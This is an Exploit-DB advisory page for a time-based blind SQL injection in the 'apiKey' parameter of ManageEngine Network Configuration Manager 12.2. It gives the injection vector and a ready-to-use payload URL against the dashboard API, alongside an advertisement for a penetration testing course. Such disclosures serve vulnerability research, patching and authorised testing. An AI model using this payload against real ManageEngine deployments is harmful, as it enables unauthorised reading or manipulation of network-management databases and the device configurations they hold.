ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection

EDB-ID:

47949

CVE:

N/A




Platform:

Java

Date:

2020-01-21


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

# Exploit Title: ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection
# discovery Date: 2019-01-24
# published : 2020-01-20
# Exploit Author: AmirHadi Yazdani
# Vendor Homepage: https://www.manageengine.com/network-configuration-manager/
# Software Link: https://www.manageengine.com/network-configuration-manager/
# Demo: http://demo.networkconfigurationmanager.com
# Version: <= Build Version  : 12.2
# Tested on: win 2012 R2
------------
About ManageEngine Network Configuration Manager(NCM) (From Vendor Site) :     
                                
Network Configuration Manager is a multi vendor network change,
configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices.
NCM helps automate and take total control of the entire life cycle of device configuration management.
--------------------------------------------------------

Exploit POC :

# Parameter: apiKey (GET)
# Title: PostgreSQL Time Based Blind
# Vector: AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))

#Payload:  
http://127.0.0.1/api/json/dashboard/getOverviewList?apiKey=1 AND 1398=(SELECT COUNT(*) FROM GENERATE_SERIES(1,3000000))&TimeFrame=hourly&_=1483732552930

--------------------------